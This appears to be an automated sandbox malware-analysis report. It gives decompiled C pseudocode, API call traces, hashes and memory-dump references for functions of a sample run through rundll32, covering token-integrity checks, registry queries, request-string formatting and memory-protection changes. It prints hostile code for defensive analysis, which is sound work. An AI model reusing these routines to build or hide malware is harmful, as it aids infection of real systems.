0x0079116c
0x00791177
0x0079118f
0x0079119c
0x0079119f
0x007911a4
0x007911af
0x007911b3
0x007911c2
0x007911c6
0x007911e2
0x007911e2
0x007911e6
0x007911e6
0x007911eb
0x007911ef
0x007911f5
0x007911f6
0x007911fd
0x00791203

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 0079116F
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 0079118F
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0079119F
CloseHandle.KERNEL32(00000000), ref: 007911EF

Part of subcall function 00796837: RtlAllocateHeap.NTDLL(00000000,00000000,00794197), ref: 00796843

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 007911C2
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 007911CA
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 007911DA

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 6e7254eb9ea141d350f4c5a5b1c97a3f4eb9cb828f90a8e28dcaba3abedb02e5
Instruction ID: 832e7ce3ab58c3158ec0130c6eb3dca4f6c9172447e953668c323f10a21ce939
Opcode Fuzzy Hash: 6e7254eb9ea141d350f4c5a5b1c97a3f4eb9cb828f90a8e28dcaba3abedb02e5
Instruction Fuzzy Hash: 86216D7590021EFFEF019F94DC84EAEBBB8FB08304F508066F610A2261D7758E55EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0079624D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E0079624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x79a2d4; // 0x487d5a8
				_t1 = _t9 + 0x79b60c; // 0x253d7325
				_t36 = 0;
				_t28 = E0079278C(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x5019631
					_t40 = E00796837(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E007949FE(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E007950CA(_t40);
						_t42 = E00797565(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E007950CA(_t36);
							_t36 = _t42;
						}
						_t43 = E007952E5(_t36, _t33);
						if(_t43 != 0) {
							E007950CA(_t36);
							_t36 = _t43;
						}
					}
					E007950CA(_t28);
				}
				return _t36;
			}

0x0079624d
0x00796250
0x00796251
0x00796258
0x0079625f
0x00796266
0x0079626a
0x00796271
0x00796278
0x0079627d
0x00796285
0x0079628f
0x00796293
0x00796297
0x0079629d
0x007962a2
0x007962ac
0x007962b2
0x007962b4
0x007962cb
0x007962cf
0x007962d2
0x007962d7
0x007962d7
0x007962e0
0x007962e4
0x007962e7
0x007962ec
0x007962ec
0x007962e4
0x007962ef
0x007962f4
0x007962fa

APIs

Part of subcall function 0079278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00796266,253D7325,00000000,00000000,?,00000000,007970D9), ref: 007927F3
Part of subcall function 0079278C: sprintf.NTDLL ref: 00792814

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,007970D9,00000000,05019630), ref: 00796278
lstrlen.KERNEL32(00000000,?,00000000,007970D9,00000000,05019630), ref: 00796280

Part of subcall function 00796837: RtlAllocateHeap.NTDLL(00000000,00000000,00794197), ref: 00796843

strcpy.NTDLL ref: 00796297
lstrcat.KERNEL32(00000000,00000000), ref: 007962A2

Part of subcall function 007949FE: lstrlen.KERNEL32(00000000,00000000,007970D9,00000000,?,007962B1,00000000,007970D9,?,00000000,007970D9,00000000,05019630), ref: 00794A0F

Part of subcall function 007950CA: RtlFreeHeap.NTDLL(00000000,00000000,00794239,00000000,00000001,?,00000000,?,?,?,00796B8D,00000000,?,00000001), ref: 007950D6

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,007970D9,?,00000000,007970D9,00000000,05019630), ref: 007962BF

Part of subcall function 00797565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,007962CB,00000000,?,00000000,007970D9,00000000,05019630), ref: 0079756F
Part of subcall function 00797565: _snprintf.NTDLL ref: 007975CD

Strings

=, xrefs: 007962B9

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 7bfbe8bcef4fdf5716460663503c2e1626c79bac3d0ae696abb0ca29a8b4b5c0
Instruction ID: 9ec23800973b54c54c8ef7d2687d0954b87c73de042a695ec4cacc4a31ecf8b3
Opcode Fuzzy Hash: 7bfbe8bcef4fdf5716460663503c2e1626c79bac3d0ae696abb0ca29a8b4b5c0
Instruction Fuzzy Hash: 8B117377901635B74F126BBCAC49C6E36ADAE497603054116F904A7102DE3DDD0297E5

Uniqueness

Uniqueness Score: -1.00%

Function 6D49C3C0, Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 406
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(6D55F8D8,0000317D,6D4C85C8,000001B4,-00000040), ref: 6D49C69A
GetCurrentDirectoryA.KERNEL32(00000646,C:\Users\user\Desktop), ref: 6D49C895

Strings

}1, xrefs: 6D49C3CE
!, xrefs: 6D49C8A0
C:\Users\user\Desktop, xrefs: 6D49C88B

Memory Dump Source

Source File: 00000003.00000002.925622775.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d47e000_rundll32.jbxd

Similarity

API ID: CurrentDirectoryProtectVirtual
String ID: !$C:\Users\user\Desktop$}1
API String ID: 3548899580-1916678420
Opcode ID: b096ea746419be11b360ec7ea6d48d414d878ff650df140c598e5b1172b561c5
Instruction ID: cd771fcc6a4fddc856b40e1955cb7b8fd367b0e22fd5e7bcc987599ab6f5f536
Opcode Fuzzy Hash: b096ea746419be11b360ec7ea6d48d414d878ff650df140c598e5b1172b561c5
Instruction Fuzzy Hash: 9A122B74A04145CFCB48EF6DC690AAABFF2FB9E304B1081AAD4459B385D7B49E12CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0079161A, Relevance: 6.2, APIs: 4, Instructions: 152
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(00000000), ref: 0079165B
SysFreeString.OLEAUT32(00000000), ref: 0079173E

Part of subcall function 00796C6D: SysAllocString.OLEAUT32(007992B0), ref: 00796CBD

SafeArrayDestroy.OLEAUT32(?), ref: 00791792
SysFreeString.OLEAUT32(?), ref: 007917A0

Part of subcall function 00791FC2: Sleep.KERNELBASE(000001F4), ref: 0079200A

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 7fa86a64ef39a4b0ea20999f825b90479a548801ae8fd080651610046b9d7ac4
Instruction ID: b07ecdd06a2cde804a4e4a7767136fdcd5d51030bad4730549c43c64b912b19d
Opcode Fuzzy Hash: 7fa86a64ef39a4b0ea20999f825b90479a548801ae8fd080651610046b9d7ac4
Instruction Fuzzy Hash: 9F51127690024BEFDF00DFE8D8848AEB7B6FF88340B548869E515DB220D739AD56CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00795C35, Relevance: 6.1, APIs: 4, Instructions: 98
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(80000002), ref: 00795C8C
SysAllocString.OLEAUT32(00791E05), ref: 00795CCF
SysFreeString.OLEAUT32(00000000), ref: 00795CE3
SysFreeString.OLEAUT32(00000000), ref: 00795CF1

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: f31ecf4698e42f028676f1cc16c44cc722592419de4366b549b3b64feffc2428
Instruction ID: c52ef8f130b13bf82fb27ccd125be013c6f023b11e0f49a241b63071a3a82e50
Opcode Fuzzy Hash: f31ecf4698e42f028676f1cc16c44cc722592419de4366b549b3b64feffc2428
Instruction Fuzzy Hash: 0631FD7290061AEFCF06DF98E9D48AE7BB5FF48340B20842EF90597210D7799945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 6D48D310, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 342COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000646,C:\Users\user\Desktop), ref: 6D48D37C
GetModuleFileNameA.KERNELBASE(00000000,?,00000646), ref: 6D48D43F

Strings

C:\Users\user\Desktop, xrefs: 6D48D36A, 6D48D4CE, 6D48D4F5, 6D48D509, 6D48D50A

Memory Dump Source

Source File: 00000003.00000002.925622775.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d47e000_rundll32.jbxd

Similarity

API ID: FileModuleNamePathTemp
String ID: C:\Users\user\Desktop
API String ID: 1080798513-224404859
Opcode ID: 3ea6fbf8a786b1da3982ef28b78393b96b2cf92f4b885ffdee83d6032c983d25
Instruction ID: 461a61e051cd24f7d77c873864833d45579dc057daefe93e6abe196468a5d9a1
Opcode Fuzzy Hash: 3ea6fbf8a786b1da3982ef28b78393b96b2cf92f4b885ffdee83d6032c983d25
Instruction Fuzzy Hash: E1E16BB16052418FCB08EF38C994B6A7BF1BB9A344F59462EE84187386EBB4DC05CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00791AB8, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00791AB8(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00794C8C(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x79a2d4; // 0x487d5a8
				_t4 = _t24 + 0x79bd60; // 0x5019308
				_t5 = _t24 + 0x79bd08; // 0x4f0053
				_t26 = E00795384( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x79a2d4; // 0x487d5a8
						_t11 = _t32 + 0x79bd54; // 0x50192fc
						_t48 = _t11;
						_t12 = _t32 + 0x79bd08; // 0x4f0053
						_t52 = E00795D37(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x79a2d4; // 0x487d5a8
							_t13 = _t35 + 0x79bd9e; // 0x30314549
							_t37 = E007974B6(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x79a2b4 - 6;
								if( *0x79a2b4 <= 6) {
									_t42 =  *0x79a2d4; // 0x487d5a8
									_t15 = _t42 + 0x79bbaa; // 0x52384549
									E007974B6(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x79a2d4; // 0x487d5a8
							_t17 = _t38 + 0x79bd98; // 0x5019340
							_t18 = _t38 + 0x79bd70; // 0x680043
							_t45 = E00791F7A(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x79a290, 0, _t52);
						}
					}
					HeapFree( *0x79a290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00793C84(_t54);
				}
				return _t45;
			}

0x00791ab8
0x00791ac8
0x00791acb
0x00791ad2
0x00791ad4
0x00791ad4
0x00791ad7
0x00791adc
0x00791ae3
0x00791af0
0x00791af5
0x00791af9
0x00791b07
0x00791b15
0x00791b19
0x00791baa
0x00791baa
0x00791b1f
0x00791b1f
0x00791b24
0x00791b24
0x00791b2b
0x00791b37
0x00791b39
0x00791b3b
0x00791b3d
0x00791b44
0x00791b4f
0x00791b56
0x00791b58
0x00791b5f
0x00791b61
0x00791b68
0x00791b73
0x00791b73
0x00791b5f
0x00791b78
0x00791b7d
0x00791b84
0x00791ba2
0x00791ba4
0x00791ba4
0x00791b3b
0x00791bb6
0x00791bb6
0x00791bb8
0x00791bbd
0x00791bbf
0x00791bbf
0x00791bca

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05019308,00000000,?,73BCF710,00000000,73BCF730), ref: 00791B07
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05019340,?,00000000,30314549,00000014,004F0053,050192FC), ref: 00791BA4
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,007920B0), ref: 00791BB6

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 140dc1e28cbb93886d2690b7fabc56a163d1d39ddfedb020077ea3c905b39f32
Instruction ID: 36d6c6e55057487d7fd95aa8395e3b41288b33f9a9207e29d5916708cff2b26f
Opcode Fuzzy Hash: 140dc1e28cbb93886d2690b7fabc56a163d1d39ddfedb020077ea3c905b39f32
Instruction Fuzzy Hash: B331B372A0110AFFDF11DBA4EE84EAE7BBDEB84704F140196B504A7161E37D5E09DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00795F9A, Relevance: 4.6, APIs: 3, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00795F9A(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t46 = __edx;
				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0x79a2d4; // 0x487d5a8
				_t2 = _t22 + 0x79b662; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0x79a2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x79a2a4 =  *0x79a2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E0079283A(_t49, _t48);
					_t33 = E0079738C(_t48, _t49);
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0x79a2a4 < 5) {
							 *0x79a2a4 =  *0x79a2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E00791492();
					HeapFree( *0x79a290, 0, _t48);
					goto L9;
				}
				_t50 =  *0x79a390; // 0x5018d5d
				if(RtlAllocateHeap( *0x79a290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E007946D1(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
				goto L5;
			}

0x00795f9a
0x00795f9a
0x00795fa1
0x00795fa8
0x00795fac
0x00795fb1
0x00795fbc
0x00795fcc
0x0079600f
0x00796013
0x00796017
0x00796018
0x0079601b
0x00796020
0x00796020
0x00796023
0x00796027
0x00796061
0x00796061
0x00796067
0x0079606e
0x0079606e
0x00796029
0x0079602c
0x0079602e
0x0079603b
0x0079603d
0x00796044
0x0079607b
0x00796080
0x00796082
0x00796084
0x00796084
0x00000000
0x00796082
0x00796046
0x0079604d
0x0079605b
0x00000000
0x0079605b
0x00795fce
0x00795fe9
0x00796003
0x00000000
0x00796003
0x00795ffc
0x00000000

APIs

wsprintfA.USER32 ref: 00795FBC
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00795FE1

Part of subcall function 007946D1: GetTickCount.KERNEL32 ref: 007946E8
Part of subcall function 007946D1: wsprintfA.USER32 ref: 00794735
Part of subcall function 007946D1: wsprintfA.USER32 ref: 00794752
Part of subcall function 007946D1: wsprintfA.USER32 ref: 00794772
Part of subcall function 007946D1: wsprintfA.USER32 ref: 00794790
Part of subcall function 007946D1: wsprintfA.USER32 ref: 007947B3
Part of subcall function 007946D1: wsprintfA.USER32 ref: 007947D4

HeapFree.KERNEL32(00000000,007920FA,?,?,007920FA,?), ref: 0079605B

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID:
API String ID: 2794511967-0
Opcode ID: 5665761a2e1b09c0682a9eb897a74dab85c6733f7ee3e7d59723081dc45e99c9
Instruction ID: fb32016b9d26f1679594663f0e869ec5521f3fa8154c30f3145f88ced17dfc9e
Opcode Fuzzy Hash: 5665761a2e1b09c0682a9eb897a74dab85c6733f7ee3e7d59723081dc45e99c9
Instruction Fuzzy Hash: 25312872501209FFCF01DF68ED84E9A3BB8FF48350F108126F905A7261DB39A955CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 007971A5, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007971A5(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x79a2d4; // 0x487d5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x79ba30; // 0x4f0053
				_v16 = 4;
				_t31 = E00793875(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x79a2d4; // 0x487d5a8
					_t5 = _t19 + 0x79ba8c; // 0x6e0049
					_t34 = E00793875(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E007950CA(_t34);
					}
					E007950CA(_t31);
				}
				return _v8;
			}

0x007971ab
0x007971b0
0x007971b5
0x007971bc
0x007971c8
0x007971cc
0x007971ce
0x007971d4
0x007971e0
0x007971e4
0x007971f7
0x007971ff
0x00797213
0x0079721b
0x0079721d
0x0079721d
0x00797224
0x00797224
0x0079722b
0x0079722b
0x00797231
0x00797236
0x0079723c

APIs

Part of subcall function 00793875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,007971C8,004F0053,00000000,?), ref: 0079387E
Part of subcall function 00793875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,007971C8,004F0053,00000000,?), ref: 007938A8
Part of subcall function 00793875: memset.NTDLL ref: 007938BC

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 007971F7
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00797213
RegCloseKey.ADVAPI32(00000000), ref: 00797224

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 85a58005e5157bd585976c1491bc61c9e13351f063fff33feec477af330cc9a5
Instruction ID: 68473bf590032abdbd621ec041d21e9233d7df1bd311415a8f2a3e1bf468ce02
Opcode Fuzzy Hash: 85a58005e5157bd585976c1491bc61c9e13351f063fff33feec477af330cc9a5
Instruction Fuzzy Hash: EE115B72910209FBDF11DBE8EC89FAE77BCBB44700F10405AB601E7151EB78DA058B65

Uniqueness

Uniqueness Score: -1.00%

Function 00796872, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00796872(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00795C35(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x79a2d4; // 0x487d5a8
						_t20 = _t68 + 0x79b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E007937AF(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00796878
0x0079687b
0x0079688b
0x00796894
0x00796898
0x00796966
0x0079696c
0x0079696c
0x007968b2
0x007968b7
0x007968bb
0x007968c1
0x007968c6
0x007968cd
0x007968dc
0x007968dc
0x007968e0
0x007968e2
0x007968ee
0x007968f9
0x00796904
0x00796908
0x00796912
0x00796916
0x00796918
0x0079691d
0x00796924
0x00796934
0x00796934
0x0079691d
0x00796916
0x00796936
0x0079693b
0x00796940
0x00796940
0x00796946
0x0079694c
0x00796951
0x00796951
0x00796956
0x0079695b
0x0079695b
0x00796956
0x007968e0
0x0079695d
0x00796963
0x00000000

APIs

Part of subcall function 00795C35: SysAllocString.OLEAUT32(80000002), ref: 00795C8C
Part of subcall function 00795C35: SysFreeString.OLEAUT32(00000000), ref: 00795CF1

SysFreeString.OLEAUT32(?), ref: 00796951
SysFreeString.OLEAUT32(00791E05), ref: 0079695B

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 3bb2a0fc092d565c9ca90c401b214bbaaa0b75b3bb767239818c0d1a2b9fa01a
Instruction ID: e8d7fd8e3f315d5dbd04bb02610128be16fafa1f293066082f4f1700ea19cb31
Opcode Fuzzy Hash: 3bb2a0fc092d565c9ca90c401b214bbaaa0b75b3bb767239818c0d1a2b9fa01a
Instruction Fuzzy Hash: 30315872500119EFCF21DF68D988C9BBB79FFC97507104658F9199B214E335AD51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007974B6, Relevance: 3.0, APIs: 2, Instructions: 47
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007974B6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t15;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E00794AA6(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000; // executed
					_t15 = E00796304(__ecx, _a4, _a8, _t23); // executed
					_t20 = _t15;
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E00795F2A(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0x79a290, 0, _t23);
				}
				return _t20;
			}

0x007974b6
0x007974c7
0x007974cb
0x00797524
0x007974cd
0x007974d4
0x007974da
0x007974de
0x007974e3
0x007974e7
0x007974ed
0x007974fd
0x0079750f
0x0079750f
0x0079751a
0x0079751a
0x0079752b

APIs

Part of subcall function 00794AA6: lstrlen.KERNEL32(?,00000000,05019C98,745EC740,007913D0,05019E9D,007955DE,007955DE,?,007955DE,?,63699BC3,E8FA7DD7,00000000), ref: 00794AAD
Part of subcall function 00794AA6: mbstowcs.NTDLL ref: 00794AD6
Part of subcall function 00794AA6: memset.NTDLL ref: 00794AE8

